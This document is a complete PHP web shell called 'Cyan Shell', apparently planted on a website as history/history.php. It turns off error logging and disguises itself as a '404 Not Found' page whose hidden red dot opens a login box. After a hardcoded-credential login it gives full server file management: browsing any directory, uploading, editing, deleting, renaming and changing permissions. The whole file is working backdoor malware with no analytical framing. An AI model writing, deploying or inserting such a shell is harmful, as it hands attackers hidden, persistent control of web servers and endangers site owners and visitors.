File: /home/rtbrisc/www/history/history.php
<?php
ob_start();
@ini_set('display_errors', '0');
@ini_set('display_startup_errors', '0');
@ini_set('log_errors', '0');
@ini_set('error_reporting', 0);
error_reporting(0);
$a = '/tmp';
$b = __DIR__ . '/sess';
if (!@is_dir($a)) {
if (!@is_dir($b)) @mkdir($b, 0777, true);
@ini_set('session.save_path', $b);
} else {
@ini_set('session.save_path', $a);
}
@session_name('sessid');
@session_start();
$username = "djawa";
$passwordHash = "23af4255c402219567c3267063514c29"; // md5('password')
function generateUUID() {
return function_exists('random_bytes') ? bin2hex(random_bytes(16)) : md5(uniqid('', true));
}
$err = '';
if (isset($_POST['username']) && isset($_POST['password'])) {
$inputUsername = $_POST['username'];
$inputPassword = md5($_POST['password']);
if ($inputUsername === $username && $inputPassword === $passwordHash) {
$_SESSION['token'] = generateUUID();
$_SESSION['authenticated'] = true;
$_SESSION['username'] = $username;
header("Location: " . $_SERVER["PHP_SELF"]);
exit;
} else {
$err = "Incorrect username or password. Please try again."; // Pesan error yang lebih deskriptif
}
}
if (!isset($_SESSION['authenticated']) || $_SESSION['authenticated'] !== true) {
?>
<!DOCTYPE html>
<html>
<head>
<meta charset="UTF-8">
<title>404 Not Found</title>
<style>
html,body{margin:0;padding:0;height:100%;overflow:hidden}
iframe{position:absolute;top:0;left:0;width:100vw;height:100vh;border:none}
/* Style untuk Login Box, menyesuaikan dengan edit-file.php */
#login-modal-container{
position:fixed;
top:50%;
left:50%;
transform:translate(-50%,-50%);
background:white;
padding:30px;
border-radius:12px;
box-shadow:0 10px 30px rgba(0,0,0,0.3);
z-index:10001;
display:none;
min-width:300px;
}
#login-modal-container.show{
display:block;
animation:fadeIn 0.3s ease;
}
@keyframes fadeIn{
from{opacity:0;transform:translate(-50%,-60%)}
to{opacity:1;transform:translate(-50%,-50%)}
}
.login-input{
width:100%;
padding:12px;
margin:10px 0;
border:2px solid #ddd;
border-radius:6px;
font-size:16px;
box-sizing:border-box;
}
.login-input:focus{
border-color:#007bff;
outline:none;
}
.submit-btn{
width:100%;
padding:12px;
background:#007bff;
color:white;
border:none;
border-radius:6px;
font-size:16px;
cursor:pointer;
transition:background 0.3s;
margin-top:10px;
}
.submit-btn:hover{
background:#0056b3;
}
.error-message{
color:#dc3545;
font-size:14px;
margin-top:10px;
display:<?php echo empty($err) ? 'none' : 'block'; ?>; /* Tampilkan error dari PHP */
text-align:center;
}
/* Clue Dot Styles */
.clue-dot{
position:fixed;
bottom:25px;
right:25px;
width:16px;
height:16px;
background:rgba(255,59,48,0.8);
border-radius:50%;
cursor:pointer;
z-index:10000;
box-shadow:0 2px 8px rgba(0,0,0,0.3);
border:2px solid rgba(255,255,255,0.9);
transition:all 0.3s ease;
animation:pulse 2s infinite;
}
.clue-dot:hover{
transform:scale(1.2);
background:rgba(255,59,48,1);
box-shadow:0 4px 12px rgba(0,0,0,0.4);
}
.clue-dot:active{
transform:scale(0.9);
}
@keyframes pulse{
0%{box-shadow:0 0 0 0 rgba(255,59,48,0.7)}
70%{box-shadow:0 0 0 10px rgba(255,59,48,0)}
100%{box-shadow:0 0 0 0 rgba(255,59,48,0)}
}
/* Tooltip */
.clue-dot::after{
content:"Login Access";
position:absolute;
bottom:100%;
right:0;
background:rgba(0,0,0,0.8);
color:white;
padding:8px 12px;
border-radius:6px;
font-size:12px;
white-space:nowrap;
opacity:0;
transform:translateY(-10px);
transition:all 0.3s ease;
pointer-events:none;
}
.clue-dot:hover::after{
opacity:1;
transform:translateY(-5px);
}
</style>
</head>
<body>
<iframe src="/404"></iframe>
<div id="login-modal-container" class="<?php echo empty($err) ? '' : 'show'; ?>">
<h3 style="margin:0 0 20px 0;text-align:center;">Enter Credentials</h3>
<form id="loginForm" method="POST">
<input type="text" name="username" id="usernameInput" class="login-input" placeholder="Username..." autocomplete="off">
<input type="password" name="password" id="passwordInput" class="login-input" placeholder="Password..." autocomplete="off">
<button type="submit" class="submit-btn">Login</button>
</form>
<div class="error-message" id="errorMessage"><?php echo htmlspecialchars($err); ?></div>
</div>
<div class="clue-dot" title="Click for login access"></div>
<script>
const dot = document.querySelector('.clue-dot');
const loginModal = document.getElementById('login-modal-container');
const usernameInput = document.getElementById('usernameInput');
const passwordInput = document.getElementById('passwordInput');
const errorMessage = document.getElementById('errorMessage');
const loginForm = document.getElementById('loginForm');
// Show login modal when dot is clicked
dot.addEventListener('click', function() {
loginModal.classList.add('show');
usernameInput.focus();
errorMessage.style.display = 'none'; // Sembunyikan pesan error saat pertama kali dibuka
});
// Allow Enter key in password input to submit
passwordInput.addEventListener('keypress', function(e) {
if (e.key === 'Enter') {
e.preventDefault();
loginForm.submit();
}
});
// Close modal when clicking outside
loginModal.addEventListener('click', function(e) {
if (e.target === loginModal) {
loginModal.classList.remove('show');
errorMessage.style.display = '<?php echo empty($err) ? 'none' : 'block'; ?>';
}
});
// Ensure modal is shown if there was a login error
<?php if (!empty($err)): ?>
loginModal.classList.add('show');
<?php endif; ?>
</script>
</body>
</html>
<?php exit; }
$tmp = function_exists('posix_getpwuid') ? @posix_getpwuid(@fileowner(__FILE__)) : get_current_user();
$system_user = is_array($tmp) ? $tmp['name'] : $tmp;
$cwd = isset($_GET["d"]) ? $_GET["d"] : getcwd();
if (strpos($cwd, '..') !== false || !@chdir($cwd)) $cwd = getcwd();
if (isset($_FILES["upfile"]["tmp_name"])) {
$name = basename($_FILES["upfile"]["name"]);
$dest = $cwd . "/" . $name;
if (is_uploaded_file($_FILES["upfile"]["tmp_name"])) @move_uploaded_file($_FILES["upfile"]["tmp_name"], $dest);
}
if (isset($_POST["mkdir"])) @mkdir($cwd . "/" . $_POST["mkdir"]);
if (isset($_POST["mkfile"])) @file_put_contents($cwd . "/" . $_POST["mkfile"], "");
if (isset($_GET["delete"])) {
$target = realpath($cwd . "/" . $_GET["delete"]);
if ($target && strpos($target, $cwd) === 0) {
@is_dir($target) ? @rmdir($target) : @unlink($target);
}
}
if (isset($_POST["rename_target"], $_POST["rename_new"])) @rename($cwd . "/" . $_POST["rename_target"], $cwd . "/" . $_POST["rename_new"]);
if (isset($_POST["editfile"], $_POST["content"])) {
$target = realpath($cwd . "/" . $_POST["editfile"]);
if ($target && strpos($target, $cwd) === 0) @file_put_contents($target, $_POST["content"]);
}
if (isset($_POST["chmod_target"], $_POST["chmod_val"])) {
$target = realpath($cwd . "/" . $_POST["chmod_target"]);
$val = preg_replace('/[^0-7]/', '', $_POST["chmod_val"]);
if ($target && strlen($val) >= 3) @chmod($target, octdec($val));
}
function perms($file) {
$p = @fileperms($file);
if ($p === false) return '?????????';
$t = ($p & 0x4000) ? 'd' : (($p & 0xA000) ? 'l' : '-');
$t .= ($p & 0x0100) ? 'r' : '-'; $t .= ($p & 0x0080) ? 'w' : '-'; $t .= ($p & 0x0040) ? 'x' : '-';
$t .= ($p & 0x0020) ? 'r' : '-'; $t .= ($p & 0x0010) ? 'w' : '-'; $t .= ($p & 0x0008) ? 'x' : '-';
$t .= ($p & 0x0004) ? 'r' : '-'; $t .= ($p & 0x0002) ? 'w' : '-'; $t .= ($p & 0x0001) ? 'x' : '-';
return $t;
}
echo <<<HTML
<!DOCTYPE html><html><head><meta charset="UTF-8"><title>Cyan Shell</title>
<style>body{background:#000;color:#0ff;font-family:monospace;padding:20px}input,textarea{background:#000;color:#0ff;border:1px solid #0ff;padding:5px;margin:3px}input[type=submit]{cursor:pointer}a{color:#0ff;text-decoration:none;margin-right:10px}a:hover{text-shadow:0 0 5px #0ff}.box{border:1px solid #0ff;padding:10px;margin:10px 0}.actions{display:inline-block;margin-left:10px}.chmod-text{cursor:pointer}.chmod-input{background:#111;color:#0ff;border:1px solid #0ff;padding:2px;width:50px;display:none}</style>
</head><body><h2 style="color:#0ff">🧠Cyan Shell | Login: YES</h2><div class=box><b>Current Dir:</b>
HTML;
$parts = explode("/", $cwd);
$build = "";
foreach ($parts as $i => $part) {
if ($part == "" && $i == 0) { $build = "/"; echo '<a href="?d=/">/</a>'; continue; }
if ($part == "") continue;
$build .= ($build == "/" ? "" : "/") . $part;
echo '/<a href="?d=' . $build . '">' . $part . '</a>';
}
echo <<<HTML
</div><div class=box style="display:flex;flex-wrap:wrap;gap:10px;align-items:center;">
<form method=post enctype=multipart/form-data style="display:inline-flex;align-items:center;"> Upload: <input type=file name=upfile> <input type=submit value=Upload></form>
<form method=post style="display:inline-flex;align-items:center;"> Create File: <input name=mkfile> <input type=submit value=Create></form>
<form method=post style="display:inline-flex;align-items:center;"> Create Dir: <input name=mkdir> <input type=submit value=Create></form></div>
<div class=box><b>Directory Content:</b><div style="display:flex;flex-direction:column;gap:4px;">
HTML;
$items = @scandir($cwd);
$dirs = $files = [];
foreach ($items ?: [] as $f) {
if ($f === '.' || $f === '..') continue;
$path = $cwd . '/' . $f;
is_dir($path) ? $dirs[] = $f : $files[] = $f;
}
foreach (array_merge($dirs, $files) as $f) {
$path = $cwd . '/' . $f;
$isDir = is_dir($path);
$perm = perms($path);
$ownerRaw = function_exists('posix_getpwuid') ? @posix_getpwuid(@fileowner($path)) : null;
$owner = is_array($ownerRaw) ? $ownerRaw['name'] : get_current_user();
$fid = md5($path);
$color = (substr(sprintf('%o', fileperms($path)), -4) === '0000') ? '#f33' : '#0ff';
echo "<form method=post style='display:flex;gap:20px;align-items:center;'>";
echo "<div style='width:60px;'>" . ($isDir ? '[DIR]' : '[FILE]') . "</div>";
echo "<div style='min-width:300px;'><a href='?d=$path'>$f</a></div>";
echo "<div style='width:150px;color:#0ff;'>$owner</div>";
echo "<div style='width:90px;'><span id='chmod-text-$fid' class='chmod-text' style='color:$color' onclick='toggleChmod(\"chmod-text-$fid\",\"chmod-input-$fid\")'>$perm</span><input id='chmod-input-$fid' class='chmod-input' value='755' onkeydown='submitChmod(event,this,\"$f\")'></div>";
echo "<div class='actions'><a href='?d=$cwd&delete=$f' onclick='return confirm(\"Delete $f?\")'>Delete</a> ";
echo "<a href='#' onclick='renamePrompt(\"$f\")'>Rename</a> ";
if (!$isDir) echo "<a href='?d=$cwd&edit=$f'>Edit</a>";
echo "</div></form>";
}
echo <<<HTML
</div></div><div id=renameForm class=box style="display:none;"><form method=post><input type=hidden name=rename_target id=rename_target> Rename to: <input name=rename_new id=rename_new> <input type=submit value=Rename></form></div>
HTML;
if (isset($_GET["edit"])) {
$f = basename($_GET["edit"]);
$path = realpath($cwd . "/" . $f);
if ($path && strpos($path, $cwd) === 0 && is_file($path)) {
$src = @file_get_contents($path);
echo "<div class=box><form method=post>";
echo "<input type=hidden name=editfile value='$f'>";
echo "<b>Editing: $f</b><br>";
echo "<textarea name=content rows=20 cols=100>" . htmlentities($src) . "</textarea><br>";
echo "<input type=submit value=Save></form></div>";
}
}
echo <<<HTML
<script>
function renamePrompt(f){document.getElementById('rename_target').value=f;document.getElementById('rename_new').value=f;document.getElementById('renameForm').style.display='block'}
function toggleChmod(t,i){document.getElementById(t).style.display='none';document.getElementById(i).style.display='inline-block';document.getElementById(i).focus()}
function submitChmod(e,i,f){
if(e.key==='Enter'){
e.preventDefault();
var v=i.value;
var form=document.createElement('form');
form.method='POST';
form.style.display='none';
form.action=location.href;
var t=document.createElement('input');
t.name='chmod_target';t.type='hidden';t.value=f;
var v2=document.createElement('input');
v2.name='chmod_val';v2.type='hidden';v2.value=v;
form.appendChild(t);form.appendChild(v2);
document.body.appendChild(form);form.submit();
}
}
</script></body></html>
HTML;
?>
<?php ob_end_flush(); ?>